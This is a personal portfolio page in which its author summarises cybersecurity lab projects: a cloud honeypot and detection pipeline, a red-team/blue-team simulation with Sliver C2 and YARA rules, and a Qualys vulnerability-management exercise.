My Projects

Project Sentinel

  • Designed and deployed a cloud-native SOC-in-a-box using AWS, capturing real-world attacker sessions and generating actionable threat intelligence.

  • Built a real-time detection pipeline (CloudWatch → Lambda → OpenSearch) to normalize logs, enrich events, reduce noise, and store curated alerts for threat analysis.

  • Developed Apache Airflow security workflows for daily vulnerability management, CVE/asset correlation, risk-based prioritization, and IOC feed ingestion.

  • Implemented AI-assisted analysis to summarize attacker activity, extract IOCs, classify behavior, and support triage with contextual insight.

  • Created automation pipelines for CSV reporting, email summaries, and structured outputs consumable by SOC analysts and SIEM tools.

  • Integrated Cowrie and Suricata to detect brute-force attempts, malicious payloads, and exploitation traffic, producing attacker-derived intelligence.

  • Reduced SIEM storage costs by 50–70% via Lambda filtering and tiered S3 Glacier retention without losing forensic value.

  • Delivered dashboards, scripts, and orchestrated workflows demonstrating modern SOC engineering, detection logic, threat intel, and automation skills.

View More
Adversary Simulation & Threat Detection

  • Built a simulated attack environment with a Windows victim endpoint and Ubuntu C2 server running Sliver for malware command-and-control.

  • Developed and executed a custom malware payload, achieving SYSTEM-level privilege escalation on the target. (Red Team)

  • Performed threat hunting by investigating suspicious processes and identifying malicious executables on the compromised host. (Blue Team)

  • Created YARA signatures and LimaCharlie D&R rules to detect and respond to malicious activity. (Blue Team)

  • Tested and validated detection logic, confirming YARA rules effectively detected, scanned, and blocked the malware. (Threat Hunting)

Vulnerability Management Lifecycle

  • Installed and deployed Qualys Virtual Scanner Appliance and accessed it through the Qualys Cloud Platform.

  • Executed the vulnerability management Lifecycle in a virtualized environment, comprising the stages of: Discovery, Prioritization, Assessment, Reporting, Remediation, and Verification.

  • Leveraged Qualys to manage vulnerability scanning and assessed the identified vulnerabilities.

  • Detected deprecated software on a Windows 10 virtual machine, remediated the vulnerabilities and verified the software was no longer vulnerable.

© 2025 Sylvester Davis — Exploring Technology, Security & Growth